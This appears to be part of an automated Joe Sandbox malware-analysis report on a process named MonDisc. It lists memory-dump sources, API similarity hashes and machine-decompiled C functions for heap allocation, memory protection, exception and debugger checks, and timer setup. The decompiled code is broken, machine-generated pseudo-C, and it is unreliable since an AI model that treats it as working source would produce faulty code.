                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ConsoleCtrlHandler
                              • String ID:
                              • API String ID: 1513847179-0
                              • Opcode ID: 6fa80a80079bc4ac5a5af35f5006aea7ee153ea777ff53b52fbba4876d3b07a9
                              • Instruction ID: 60c2f081685211e1f1a4783eab2d387979f389ba49f7d24bae0cd4ce4978e3b4
                              • Opcode Fuzzy Hash: 6fa80a80079bc4ac5a5af35f5006aea7ee153ea777ff53b52fbba4876d3b07a9
                              • Instruction Fuzzy Hash: E1419E62F08A4282FF14CB15DC606B92B99AF96BF0F458A36D94DC77D7DE7CE4448202
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000016.00000002.505828855.000002247AB40000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002247AB40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_2247ab40000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ffc95fc358466f7e87ee8928ce5defe830781478deb736284900a12d07eec796
                              • Instruction ID: 0668ed45946c4935d60a65f631dc46f719ba550dec7a093f33be25e33be4f00e
                              • Opcode Fuzzy Hash: ffc95fc358466f7e87ee8928ce5defe830781478deb736284900a12d07eec796
                              • Instruction Fuzzy Hash: 6231442146C9A8BAF62CF7D08C0E37DF7ACEB55700FA40457C6B78B0D2D3A9841D5692
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.505828855.000002247AB40000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002247AB40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_2247ab40000_MonDisc.jbxd
                              Similarity
                              • API ID: CreateMutex
                              • String ID:
                              • API String ID: 1964310414-0
                              • Opcode ID: c5d6d032f35a6ed2b8544d8ac8ea4a382a2f8e815242c09f89e5186f177afd47
                              • Instruction ID: eac6a2f7f7f9e703709d76b71f6c68014ca392cfaf42ad5f013b4c6b10d496d7
                              • Opcode Fuzzy Hash: c5d6d032f35a6ed2b8544d8ac8ea4a382a2f8e815242c09f89e5186f177afd47
                              • Instruction Fuzzy Hash: 5421302256CCB8A9FA2536D00C5E73CFA2CD762397F6400A3CBB7490D293DD048A56C6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.505828855.000002247AB40000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002247AB40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_2247ab40000_MonDisc.jbxd
                              Similarity
                              • API ID: CreateMutex
                              • String ID:
                              • API String ID: 1964310414-0
                              • Opcode ID: 600a42b5ae6fc77c6bc28b4d1a9fe0be12661087918726e86373f52275f204c4
                              • Instruction ID: a3ce5a61094d1aac5383ac801264087901d022788e6a374b02142aa2eb1eac7f
                              • Opcode Fuzzy Hash: 600a42b5ae6fc77c6bc28b4d1a9fe0be12661087918726e86373f52275f204c4
                              • Instruction Fuzzy Hash: F011EE1259DDB8A9F22933D04C2E3BCEA7CDB62781FA80063C6A78E0D1C38D444F5592
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E00007FF67FF62C9C5ECC(void* __eax, signed int __rcx, signed int __rdx) {
                              				intOrPtr* _t22;
                              				signed int _t29;
                              
                              				_t29 = __rdx;
                              				if (__rcx == 0) goto 0x2c9c5eeb;
                              				_t1 = _t29 - 0x20; // -32
                              				_t22 = _t1;
                              				if (_t22 - __rdx < 0) goto 0x2c9c5f2e;
                              				_t25 =  ==  ? _t22 : __rcx * __rdx;
                              				goto 0x2c9c5f12;
                              				if (E00007FF67FF62C9C3C14(1) == 0) goto 0x2c9c5f2e;
                              				if (E00007FF67FF62C9E25C0(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x2c9c5f2e;
                              				RtlAllocateHeap(??, ??, ??); // executed
                              				if (_t22 == 0) goto 0x2c9c5efd;
                              				goto 0x2c9c5f3b;
                              				E00007FF67FF62C984D84(_t22);
                              				 *_t22 = 0xc;
                              				return 0;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 521979925fef54ab3c699b8e534cf5da6c91fcc543d220d43a7f0518cf905923
                              • Instruction ID: 114291eef664bf58182e2d4a33ced919b9a71479c86af2593be20bafe766e1df
                              • Opcode Fuzzy Hash: 521979925fef54ab3c699b8e534cf5da6c91fcc543d220d43a7f0518cf905923
                              • Instruction Fuzzy Hash: 0DF09054F0920341FE695B629D113B552941F5CBB0F5C5431CD0EC67C3ED2CE690E223
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 37%
                              			E00007FF67FF62C93B610(long long* __rax, long long __rbx, long long __rcx, long long* __rdx, void* _a8, long long _a16) {
                              				int _t11;
                              				long long* _t26;
                              				void* _t27;
                              
                              				_a16 = __rbx;
                              				_t26 = __rdx;
                              				if ( *((intOrPtr*)(__rcx + 0xbe8)) != 0) goto 0x2c93b636;
                              				E00007FF67FF62C93B7F0(__rax, __rcx, __rcx, _t27); // executed
                              				goto 0x2c93b665;
                              				if ( *((intOrPtr*)(__rcx + 0xbe4)) == 4) goto 0x2c93b665;
                              				r8d = 4; // executed
                              				_t11 = VirtualProtect(??, ??, ??, ??); // executed
                              				if (_t11 == 0) goto 0x2c93b681;
                              				 *((intOrPtr*)(__rcx + 0xbe4)) = 4;
                              				 *_t26 =  *((intOrPtr*)(__rcx + 0xbf8));
                              				return _t11;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Virtual$Protect$AllocFree
                              • String ID:
                              • API String ID: 3729553426-0
                              • Opcode ID: 8f05001ae3a681e52af4ae4ae8ee654af86365180a678d0bc3cfca32081500b6
                              • Instruction ID: 8bd9e3f5ad4bb10ba5b78c4658b83e065430e7855b1ba5beee143c97626bcd66
                              • Opcode Fuzzy Hash: 8f05001ae3a681e52af4ae4ae8ee654af86365180a678d0bc3cfca32081500b6
                              • Instruction Fuzzy Hash: F3F0EC61B0968685EF54AF26E9547F93360EB48FACF081036DF1E8B756CF38D5508711
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Similarity
                              • API ID: CreateMutex
                              • String ID:
                              • API String ID: 1964310414-0
                              • Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                              • Instruction ID: d40060df0a17990a106941c19d1d09c044d5f018af3adc10a767e17fd0b3a797
                              • Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                              • Instruction Fuzzy Hash: E3013C26204E8589DB159F3AC8504ACBBF4FB49F9DB088225DF899732CEF35D545C740
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00007FF67FF62C8FF9D0() {
                              				long _t43;
                              				void* _t47;
                              				intOrPtr _t61;
                              				intOrPtr* _t73;
                              				long long _t75;
                              				long long _t76;
                              				long long _t78;
                              				signed long long _t80;
                              				void* _t84;
                              				long long _t94;
                              				void* _t96;
                              				signed long long _t100;
                              				intOrPtr _t108;
                              				void* _t112;
                              				void* _t114;
                              				void* _t115;
                              				signed long long _t117;
                              				signed int _t121;
                              				long long _t127;
                              
                              				 *((long long*)(_t114 + 0x18)) = _t75;
                              				_t115 = _t114 - 0x20;
                              				_t127 = _t94;
                              				_t76 = _t78;
                              				E00007FF67FF62C984D84(_t73);
                              				_t61 =  *_t73;
                              				 *((intOrPtr*)(_t115 + 0x60)) = _t61;
                              				_t43 = GetLastError();
                              				_t117 =  *((intOrPtr*)(_t76 + 0x20));
                              				r15d = _t43;
                              				_t108 =  *((intOrPtr*)(_t76 + 0x10));
                              				_t80 =  *(_t76 + 0x50) & 0xfffffffc;
                              				 *(_t115 + 0x68) = _t43;
                              				r8d =  *(_t80 + 0x20);
                              				 *((long long*)(_t80 + 0x60)) = _t127;
                              				_t112 =  *((intOrPtr*)(( *(_t117 - 0x10) & 0xffffffff) + 0x20)) - 0x68;
                              				r8d = E00007FF67FF62C8FEF60(0xffffffff, _t112, _t127);
                              				_t121 = _t117 * 8;
                              				 *((long long*)(_t76 + 0x28)) =  *((intOrPtr*)(_t76 + 0x20)) + _t121;
                              				_t84 = _t108 + 0x2d8;
                              				if ( *((intOrPtr*)(_t84 + 0xec)) == 0) goto 0x2c8ffa78;
                              				_t96 = _t127 - 4;
                              				 *((long long*)(_t84 + 0x80)) = _t76;
                              				E00007FF67FF62C910750(_t44, _t84, _t96); // executed
                              				if (( *(_t108 + 0x91) & 0x00000008) == 0) goto 0x2c8ffab2;
                              				if ( *((intOrPtr*)(_t108 + 0x148)) != 0) goto 0x2c8ffab2;
                              				 *((intOrPtr*)(_t108 + 0x148)) =  *((intOrPtr*)(_t108 + 0x14c));
                              				_t25 = _t96 - 4; // -1
                              				r8d = _t25;
                              				_t47 = E00007FF67FF62C8FEEA0(_t76, _t96);
                              				 *((long long*)(_t76 + 0x28)) =  *((intOrPtr*)(_t76 + 0x20)) + _t121;
                              				if (( *(_t108 + 0x91) & 0x00000004) == 0) goto 0x2c8ffb23;
                              				_t100 = _t127 - _t112 - 0x68 >> 2;
                              				r15d = E00007FF67FF62C917CA0(_t47, _t112, _t100);
                              				if (_t127 -  *((intOrPtr*)(_t80 + 0x60)) <= 0) goto 0x2c8ffaff;
                              				if (_t61 - 1 -  *((intOrPtr*)(_t112 + 0xc)) >= 0) goto 0x2c8ffaff;
                              				if (r15d == E00007FF67FF62C917CA0(_t48, _t112, _t100)) goto 0x2c8ffb1a;
                              				r8d = r15d;
                              				E00007FF67FF62C8FEEA0(_t76, _t100);
                              				 *((long long*)(_t76 + 0x28)) =  *((intOrPtr*)(_t76 + 0x20)) + _t121;
                              				r15d =  *(_t115 + 0x68);
                              				if (( *(_t108 + 0x91) & 0x00000002) == 0) goto 0x2c8ffb4a;
                              				if (( *(_t127 - 4) & 0x000000ff) - 0x49 - 3 > 0) goto 0x2c8ffb4a;
                              				_t40 = _t100 - 2; // -1
                              				r8d = _t40;
                              				E00007FF67FF62C8FEEA0(_t76, _t100);
                              				E00007FF67FF62C984D84(0xffffffff);
                              				 *0xffffffff =  *((intOrPtr*)(_t115 + 0x60));
                              				goto ( *0x2c9ee048);
                              			}

                              APIs
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: 1e88a95ae72165909cbe2a78a41288e8e4d42e1eb89ec66dd3c316d2e71af9c1
                              • Instruction ID: fed680bc6d98efa644f72a765e670f73a94de62a152064d131b7f9099c5d4c0e
                              • Opcode Fuzzy Hash: 1e88a95ae72165909cbe2a78a41288e8e4d42e1eb89ec66dd3c316d2e71af9c1
                              • Instruction Fuzzy Hash: B841D472B086818ADB21DF26D8043AD77A1FB44BA8F644631DE6D8B396CE3DE445C741
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              • Opcode ID: ff069bac779bcdd314a1f66d279dc8f486c6733c5a44f78111e97c40d74c3f9d
                              • Instruction ID: 6eec3f697eac2d33f89e608175898869f474df42c4f493bd19a3b237c20174c0
                              • Opcode Fuzzy Hash: ff069bac779bcdd314a1f66d279dc8f486c6733c5a44f78111e97c40d74c3f9d
                              • Instruction Fuzzy Hash: 6FE0C226A0AE8182EE68DB1AE8503A97AA5BB9CB98F5C8131CA8D47715DF3DC0558700
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Similarity
                              • API ID: ExtraIconicInfoLengthMessageParentTextWindow
                              • String ID:
                              • API String ID: 2293158828-0
                              • Opcode ID: 58704173757dc4f331a19e9cb3568275fbcde7f231e9f3382646aca2a6a34e48
                              • Instruction ID: c33a6b17873442fdfbbb66c89c3674a15da607b268fc6719d69d1d8e26e391df
                              • Opcode Fuzzy Hash: 58704173757dc4f331a19e9cb3568275fbcde7f231e9f3382646aca2a6a34e48
                              • Instruction Fuzzy Hash: 5CE17A56E289034AFF446F34AC6A2BA29D57F213B4F94863AD419D22D7EE3CF149C103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 65%
                              			E00007FF67FF62C9C5754(void* __ecx, intOrPtr __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8) {
                              				void* _t36;
                              				void* _t37;
                              				void* _t38;
                              				int _t43;
                              				signed long long _t65;
                              				long long _t68;
                              				_Unknown_base(*)()* _t89;
                              				void* _t93;
                              				void* _t94;
                              				void* _t96;
                              				signed long long _t97;
                              				struct _EXCEPTION_POINTERS* _t103;
                              
                              				 *((long long*)(_t96 + 0x10)) = __rbx;
                              				 *((long long*)(_t96 + 0x18)) = __rsi;
                              				_t94 = _t96 - 0x4f0;
                              				_t97 = _t96 - 0x5f0;
                              				_t65 =  *0x2ca361d8; // 0x9df21b6e58a1
                              				 *(_t94 + 0x4e0) = _t65 ^ _t97;
                              				if (__ecx == 0xffffffff) goto 0x2c9c5793;
                              				_t37 = E00007FF67FF62C974564(_t36);
                              				r8d = 0x98;
                              				_t38 = E00007FF67FF62C974DE0(_t37, 0, _t97 + 0x70, __r8);
                              				r8d = 0x4d0;
                              				E00007FF67FF62C974DE0(_t38, 0, _t94 + 0x10, __r8);
                              				 *((long long*)(_t97 + 0x48)) = _t97 + 0x70;
                              				_t68 = _t94 + 0x10;
                              				 *((long long*)(_t97 + 0x50)) = _t68;
                              				 *0x2c9ee050();
                              				r8d = 0;
                              				 *0x2c9ee058();
                              				if (_t68 == 0) goto 0x2c9c5826;
                              				 *(_t97 + 0x38) =  *(_t97 + 0x38) & 0x00000000;
                              				 *((long long*)(_t97 + 0x30)) = _t97 + 0x58;
                              				 *((long long*)(_t97 + 0x28)) = _t97 + 0x60;
                              				 *((long long*)(_t97 + 0x20)) = _t94 + 0x10;
                              				 *0x2c9ee070();
                              				 *((long long*)(_t94 + 0x108)) =  *((intOrPtr*)(_t94 + 0x508));
                              				 *((intOrPtr*)(_t97 + 0x70)) = __edx;
                              				 *((long long*)(_t94 + 0xa8)) = _t94 + 0x510;
                              				 *((long long*)(_t94 - 0x80)) =  *((intOrPtr*)(_t94 + 0x508));
                              				 *((intOrPtr*)(_t97 + 0x74)) = r8d;
                              				_t43 = IsDebuggerPresent();
                              				SetUnhandledExceptionFilter(_t89, _t93);
                              				if (UnhandledExceptionFilter(_t103) != 0) goto 0x2c9c5888;
                              				if (_t43 != 0) goto 0x2c9c5888;
                              				if (__ecx == 0xffffffff) goto 0x2c9c5888;
                              				return E00007FF67FF62C973DE0(E00007FF67FF62C974564(_t45), __ecx,  *(_t94 + 0x4e0) ^ _t97);
                              			}

                              APIs
                              Similarity
                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                              • String ID:
                              • API String ID: 1239891234-0
                              • Opcode ID: ddcf15c5e430d97c0c433eb2608b268b4dbf50b5775fd127252f593d01f75e48
                              • Instruction ID: a85af02937bf0e691d28e44ece3deadd2d20ef7f431e8afe5bb5552d12722cbe
                              • Opcode Fuzzy Hash: ddcf15c5e430d97c0c433eb2608b268b4dbf50b5775fd127252f593d01f75e48
                              • Instruction Fuzzy Hash: 12317636A08B81C6DB60CF25EC402AD73A4FB89764F540536EA8D87B9ADF3CD145CB01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Similarity
                              • API ID: AddressCriticalProcSection$CreateDeleteInitializeLibraryLoadObjectSingleThreadWait
                              • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                              • API String ID: 3275198946-184456188
                              • Opcode ID: 2e27b2875d66b769ba64ba660a062e27fc3d085249fb0a606fc32e7d451a4fae
                              • Instruction ID: bc2af7870976c3b3e8e218e2c7109714bed4bf49ed85cade7c8f7c33d0b15201
                              • Opcode Fuzzy Hash: 2e27b2875d66b769ba64ba660a062e27fc3d085249fb0a606fc32e7d451a4fae
                              • Instruction Fuzzy Hash: C1612231E1CB8286EF108B19BC615B977A8FB44BA4F580439C99D876AADF7CE055C702
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Similarity
                              • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                              • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                              • API String ID: 4260375681-184456188
                              • Opcode ID: b633c80ecc07e22be945b0d230a5f9c6b3a5a3e41201ca62d3f1db35ac4fbc3e
                              • Instruction ID: a52ea1e514fdf5798c5246d31c1803ddc23d7c4b2a8195aab2c7cd51a7936b3d
                              • Opcode Fuzzy Hash: b633c80ecc07e22be945b0d230a5f9c6b3a5a3e41201ca62d3f1db35ac4fbc3e
                              • Instruction Fuzzy Hash: 7D111322E0AB4682EF14CF28A84436933E5FB48B69F544439C94EC6269EF7DE588C301
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Similarity
                              • API ID: _set_statfp
                              • String ID: "$cosh
                              • API String ID: 1156100317-3800341493
                              • Opcode ID: 1d76b8af4efe523374b9bfc9b946712f01b33a98e4824ca67bba6a7e8418b0cb
                              • Instruction ID: e8188a516cd026b0092ab483db3e5b79355a33a4c1e902b428427e417a704a14
                              • Opcode Fuzzy Hash: 1d76b8af4efe523374b9bfc9b946712f01b33a98e4824ca67bba6a7e8418b0cb
                              • Instruction Fuzzy Hash: 88818E21D28F8588DA63CB34B8513767358AF673E5F519333E58E71A62DF6CA1834701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 44%
                              			E00007FF67FF62C9D1614(signed int __ecx, void* __rax, long long __rbx, signed long long __rcx, void* __rdx, signed int __r8) {
                              				void* _t31;
                              				signed short _t32;
                              				unsigned int _t35;
                              				unsigned int _t36;
                              				void* _t53;
                              				unsigned int _t54;
                              				void* _t57;
                              				signed int _t69;
                              				signed int _t70;
                              				void* _t73;
                              				signed int _t74;
                              				void* _t75;
                              				signed int _t79;
                              				signed int _t82;
                              				signed long long _t87;
                              				signed long long _t92;
                              				void* _t104;
                              				void* _t105;
                              				void* _t111;
                              				void* _t113;
                              				void* _t115;
                              
                              				_t92 = __rcx;
                              				 *((long long*)(_t104 + 0x10)) = __rbx;
                              				_t105 = _t104 - 0x30;
                              				r14d = 0;
                              				asm("movaps [esp+0x20], xmm6");
                              				r15d = __ecx;
                              				_t2 = _t113 + 0x10; // 0x10
                              				r13d = _t2;
                              				if ((__ecx & 0x00000008) == 0) goto 0x2c9d165d;
                              				if (r12b >= 0) goto 0x2c9d165d;
                              				E00007FF67FF62C9D0F1C(__rax, __rcx);
                              				goto 0x2c9d183f;
                              				_t69 = 0x00000004 & r15b;
                              				if (_t69 == 0) goto 0x2c9d167b;
                              				asm("dec ecx");
                              				if (_t69 >= 0) goto 0x2c9d167b;
                              				E00007FF67FF62C9D0F1C(__rax, _t92);
                              				goto 0x2c9d183f;
                              				_t70 = sil & r15b;
                              				if (_t70 == 0) goto 0x2c9d173e;
                              				asm("dec ecx");
                              				if (_t70 >= 0) goto 0x2c9d173e;
                              				_t31 = E00007FF67FF62C9D0F1C(__rax, _t92);
                              				_t87 = __r8 & _t92;
                              				if (_t70 == 0) goto 0x2c9d1709;
                              				if (_t87 == 0x2000) goto 0x2c9d16f0;
                              				if (_t87 == 0x4000) goto 0x2c9d16d7;
                              				_t73 = _t87 - _t92;
                              				if (_t73 != 0) goto 0x2c9d1736;
                              				asm("movsd xmm0, [ebp]");
                              				asm("comisd xmm0, [0x43b95]");
                              				asm("movsd xmm0, [0x4b2d5]");
                              				if (_t73 > 0) goto 0x2c9d1731;
                              				goto 0x2c9d172a;
                              				asm("movsd xmm0, [ebp]");
                              				asm("comisd xmm0, [0x43b7c]");
                              				if (_t73 > 0) goto 0x2c9d1718;
                              				asm("movsd xmm0, [0x4b2ba]");
                              				goto 0x2c9d172a;
                              				asm("movsd xmm0, [ebp]");
                              				asm("comisd xmm0, [0x43b63]");
                              				if (_t73 <= 0) goto 0x2c9d1722;
                              				asm("movsd xmm0, [0x4b2a1]");
                              				goto 0x2c9d1731;
                              				asm("movsd xmm0, [ebp]");
                              				asm("comisd xmm0, [0x43b4a]");
                              				if (_t73 <= 0) goto 0x2c9d1722;
                              				asm("movsd xmm0, [0x4b278]");
                              				goto 0x2c9d1731;
                              				asm("movsd xmm0, [0x4b26e]");
                              				asm("xorps xmm0, [0x39f9f]");
                              				asm("movsd [ebp], xmm0");
                              				goto 0x2c9d183f;
                              				_t74 = r15b & 0x00000002;
                              				if (_t74 == 0) goto 0x2c9d183f;
                              				asm("dec ecx");
                              				if (_t74 >= 0) goto 0x2c9d183f;
                              				asm("movsd xmm0, [edx]");
                              				asm("xorps xmm6, xmm6");
                              				asm("ucomisd xmm0, xmm6");
                              				if (_t74 != 0) goto 0x2c9d1771;
                              				if (_t74 != 0) goto 0x2c9d1771;
                              				goto 0x2c9d1830;
                              				_t32 = E00007FF67FF62C9D1D3C(_t31, 0x6000, _t57, _t74, _t105 + 0x70, _t115, _t113, _t111);
                              				_t53 =  *((intOrPtr*)(_t105 + 0x70)) + 0xfffffa00;
                              				asm("movsd [esp+0x88], xmm0");
                              				_t75 = _t53 - 0xfffffbce;
                              				if (_t75 >= 0) goto 0x2c9d17a1;
                              				asm("mulsd xmm0, xmm6");
                              				goto 0x2c9d182b;
                              				r8d = r14d;
                              				asm("comisd xmm6, xmm0");
                              				r8b = _t75 > 0;
                              				 *(_t105 + 0x8e) = _t32 & 0x0000000f | r13w;
                              				if (_t53 - 0xfffffc03 >= 0) goto 0x2c9d1816;
                              				_t35 =  *(_t105 + 0x88);
                              				_t54 =  *(_t105 + 0x8c);
                              				if ((sil & _t35) == 0) goto 0x2c9d17ef;
                              				_t65 =  ==  ? 1 : 1;
                              				_t36 = _t35 >> 1;
                              				 *(_t105 + 0x88) = _t36;
                              				_t79 = sil & _t54;
                              				if (_t79 == 0) goto 0x2c9d1808;
                              				asm("bts eax, 0x1f");
                              				 *(_t105 + 0x88) = _t36;
                              				if (_t79 != 0) goto 0x2c9d17e5;
                              				 *(_t105 + 0x8c) = _t54 >> 1;
                              				asm("movsd xmm0, [esp+0x88]");
                              				if (r8d == 0) goto 0x2c9d182b;
                              				asm("xorps xmm0, [0x39ea5]");
                              				asm("movsd [ebp], xmm0");
                              				_t81 =  ==  ? 1 : 1;
                              				if (( ==  ? 1 : 1) == 0) goto 0x2c9d183c;
                              				E00007FF67FF62C9D0F1C( *(_t105 + 0x88) >> 0x30, _t111);
                              				_t82 = r13b & r15b;
                              				if (_t82 == 0) goto 0x2c9d1858;
                              				asm("dec ecx");
                              				if (_t82 >= 0) goto 0x2c9d1858;
                              				E00007FF67FF62C9D0F1C( *(_t105 + 0x88) >> 0x30, _t111);
                              				asm("movaps xmm6, [esp+0x20]");
                              				r14b = (__ecx & 0) == 0;
                              				return r14d;
                              			}

























                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID:
                              • API String ID: 1156100317-0
                              • Opcode ID: 2220e806413afc76e163cbf698f7b7d258190d93046702707facc51bf7b06a9f
                              • Instruction ID: cdfaa6d2db8344b7c44afce7c9311d854bdf8702ccbf84b73afb8ae7eee11ae2
                              • Opcode Fuzzy Hash: 2220e806413afc76e163cbf698f7b7d258190d93046702707facc51bf7b06a9f
                              • Instruction Fuzzy Hash: 5751F827D0CD4645FF22AA38EC5037A6261BF49774F548235E95EB65E2DF3CA4828A02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ContextEntryFunctionLookup$CaptureRestoreUnwindVirtual
                              • String ID:
                              • API String ID: 3115360832-0
                              • Opcode ID: 057d8fa23ac03b650d3b224590ec57b1560f4d8c507465ae7ddcd15c43ac5aa1
                              • Instruction ID: 6179a57cf51987d04aed77a4880a1fac33de67376ad0af2380a3bdb4d03797b4
                              • Opcode Fuzzy Hash: 057d8fa23ac03b650d3b224590ec57b1560f4d8c507465ae7ddcd15c43ac5aa1
                              • Instruction Fuzzy Hash: 3E313032608B85C6DB65CF15E8802AAB3A5FB88B50F444536DB8D83759DF3CD659CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 84%
                              			E00007FF67FF62C9D0FB8(void* __ebx, signed int __ecx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __rdi, long long __rsi, long long _a8, long long _a16) {
                              				signed int _t43;
                              				signed int _t44;
                              				signed int _t45;
                              				signed int _t47;
                              
                              				_t53 = __rcx;
                              				_t50 = __rax;
                              				_a8 = __rbx;
                              				_a16 = __rsi;
                              				if ((__ecx & 0x00000008) == 0) goto 0x2c9d0fea;
                              				if (sil >= 0) goto 0x2c9d0fea;
                              				E00007FF67FF62C9D0F1C(__rax, __rcx);
                              				goto 0x2c9d1041;
                              				_t43 = 0x00000004 & dil;
                              				if (_t43 == 0) goto 0x2c9d1005;
                              				asm("dec eax");
                              				if (_t43 >= 0) goto 0x2c9d1005;
                              				E00007FF67FF62C9D0F1C(__rax, _t53);
                              				goto 0x2c9d1041;
                              				_t44 = dil & 0x00000001;
                              				if (_t44 == 0) goto 0x2c9d1021;
                              				asm("dec eax");
                              				if (_t44 >= 0) goto 0x2c9d1021;
                              				E00007FF67FF62C9D0F1C(__rax, _t53);
                              				goto 0x2c9d1041;
                              				_t45 = dil & 0x00000002;
                              				if (_t45 == 0) goto 0x2c9d1041;
                              				asm("dec eax");
                              				if (_t45 >= 0) goto 0x2c9d1041;
                              				if ((dil & 0x00000010) == 0) goto 0x2c9d103e;
                              				E00007FF67FF62C9D0F1C(_t50, _t53);
                              				_t47 = dil & 0x00000010;
                              				if (_t47 == 0) goto 0x2c9d105b;
                              				asm("dec eax");
